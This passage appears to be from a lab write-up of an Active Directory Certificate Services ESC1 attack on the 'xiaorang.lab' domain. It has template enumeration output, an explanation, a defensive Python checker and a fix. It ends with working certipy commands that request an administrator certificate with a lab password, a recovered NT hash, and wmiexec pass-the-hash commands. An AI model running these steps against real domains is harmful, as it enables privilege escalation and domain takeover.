XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Microsoft Trust List Signing, Secure Email, Encrypting File System, Client Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication, Client Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Computers S-1-5-21-990187620-235975882-534697781-515
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication, Client Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain Controllers S-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication, Client Authentication, Smart Card Logon
mspki-certificate-application-policy : Server Authentication, Client Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain Controllers S-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain Controllers S-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : KDC Authentication, Server Authentication, Client Authentication, Smart Card Logon
mspki-certificate-application-policy : KDC Authentication, Server Authentication, Client Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain Controllers S-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : LDAPS
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : KDC Authentication, Server Authentication, Client Authentication, Smart Card Logon
mspki-certificate-application-policy : KDC Authentication, Server Authentication, Client Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain Controllers S-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Secure Email, Encrypting File System, Client Authentication
mspki-certificate-application-policy : Secure Email, Encrypting File System, Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated Users S-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.6943600

Look for templates that set msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT. WebServer and SubCA set it too, but only Domain Admins and Enterprise Admins may enroll in those; "XR Manager" is the only template that sets it and is enrollable by ordinary users, and that combination lets us impersonate an administrator (ESC1).

ESC1 preconditions:
msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT: the requester supplies the subject and SAN of the certificate, so a user can request a certificate that names any other account, including a domain admin
pkiextendedkeyusage: Client Authentication (Smart Card Logon, PKINIT Client Authentication, Any Purpose, or no EKU at all also qualify): certificates issued from this template can be used to authenticate to Active Directory
Enrollment Rights: NT AUTHORITY\Authenticated Users (Domain Users or Domain Computers are just as bad): any authenticated principal in the domain may request a certificate from this template
Authorized Signatures Required: 0, and no PEND_ALL_REQUESTS in mspki-enrollment-flag: neither an enrollment-agent signature nor CA manager approval stands in the way
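Added example, not part of the writeup or of Certify: a Python checker that reads a Certify-style `find` dump and applies the ESC1 conditions above mechanically, which is how you would triage a CA with dozens of templates. SAMPLE_DUMP is a constructed, shortened copy of the output above with the EKU names in English (the SIDs and template names are the writeup's). WebServer and SubCA are included deliberately: both set ENROLLEE_SUPPLIES_SUBJECT but are enrollable only by admins, so they must not be flagged.

```python
"""Flag ESC1-style certificate templates in a Certify/Certipy 'find' text dump.

Parses the 'Template Name : ...' stanzas and applies the ESC1 conditions:
enrollee supplies the subject, no manager approval, no authorized signatures,
an EKU that permits authentication (or no EKU at all), and enrollment open to
a low-privileged group. SAMPLE_DUMP is a CONSTRUCTED, shortened version of the
writeup's output; it is not a live capture.
"""
from __future__ import annotations
import re

LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
# principal rows end in a SID; the dump sometimes glues it to the name ("UsersS-1-5-11")
_PRINCIPAL = re.compile(r"^(.*?)\s*(S-1-5-[\d-]+)$")


def parse_find_output(text: str) -> list[dict]:
    """Split the dump into one dict per 'Template Name' stanza."""
    templates, cur, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Template Name"):
            cur = {"name": line.split(":", 1)[1].strip(), "Enrollment Rights": []}
            templates.append(cur)
            key = None
        elif cur is None or not line:
            continue
        elif ":" in line:  # 'key : value' row; SIDs contain no colon
            key, value = (p.strip() for p in line.split(":", 1))
            if key == "Enrollment Rights":
                cur[key].append(value)
            else:
                cur[key] = value
        elif key == "Enrollment Rights" and _PRINCIPAL.match(line):
            cur[key].append(line)  # continuation row of the principal list
    return templates


def principal_name(entry: str) -> str:
    """'XIAORANG\\Domain Users S-1-5-21-...-513' -> 'Domain Users'."""
    m = _PRINCIPAL.match(entry)
    name = m.group(1) if m else entry
    return name.split("\\")[-1].strip()


def find_esc1(templates: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (template, low-privileged enrollers) for every template meeting ESC1."""
    hits = []
    for t in templates:
        ekus = {e.strip() for e in t.get("pkiextendedkeyusage", "").split(",")} - {"", "<null>"}
        low_priv = {principal_name(p) for p in t["Enrollment Rights"]} & LOW_PRIV
        if ("ENROLLEE_SUPPLIES_SUBJECT" in t.get("msPKI-Certificate-Name-Flag", "")
                and "PEND_ALL_REQUESTS" not in t.get("mspki-enrollment-flag", "")
                and int(t.get("Authorized Signatures Required", "0")) == 0
                and (not ekus or ekus & AUTH_EKUS)  # empty EKU set means any purpose
                and low_priv):
            hits.append((t["name"], sorted(low_priv)))
    return hits


SAMPLE_DUMP = r"""
Template Name : User
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Secure Email, Encrypting File System, Client Authentication
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

Template Name : WebServer
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

Template Name : SubCA
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512

Template Name : XR Manager
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Secure Email, Encrypting File System, Client Authentication
Enrollment Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
"""

if __name__ == "__main__":
    for name, groups in find_esc1(parse_find_output(SAMPLE_DUMP)):
        print(f"ESC1 candidate: {name!r}, enrollable by {', '.join(groups)}")
```

The fix follows from the same checks: remove ENROLLEE_SUPPLIES_SUBJECT from the template, or require CA manager approval (PEND_ALL_REQUESTS), or restrict Enrollment Rights to the group that actually needs the template; any one of these breaks the chain.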

ESC1

Request a certificate for the domain administrator through the XR Manager template, supplying the victim UPN as the SAN:

proxychains4 certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager'  -upn administrator@xiaorang.lab

Certipy saves the certificate and private key as administrator.pfx. Authenticating with it (certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7) uses PKINIT to obtain a TGT for administrator and, through the U2U trick, recovers the account's NT hash; from there DCSync, pass-the-ticket or pass-the-hash all work. One caveat: on DCs with strong certificate mapping enforced (KB5014754), a certificate whose SAN carries only a UPN and no SID extension is rejected, so the ESC1 chain depends on the DC's patch state as well as the template.

'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

Pass-the-hash lateral movement

The LM half is the empty-LM constant aad3b435b51404eeaad3b435b51404ee, so only the NT hash is needed:

proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.26 -codec gbk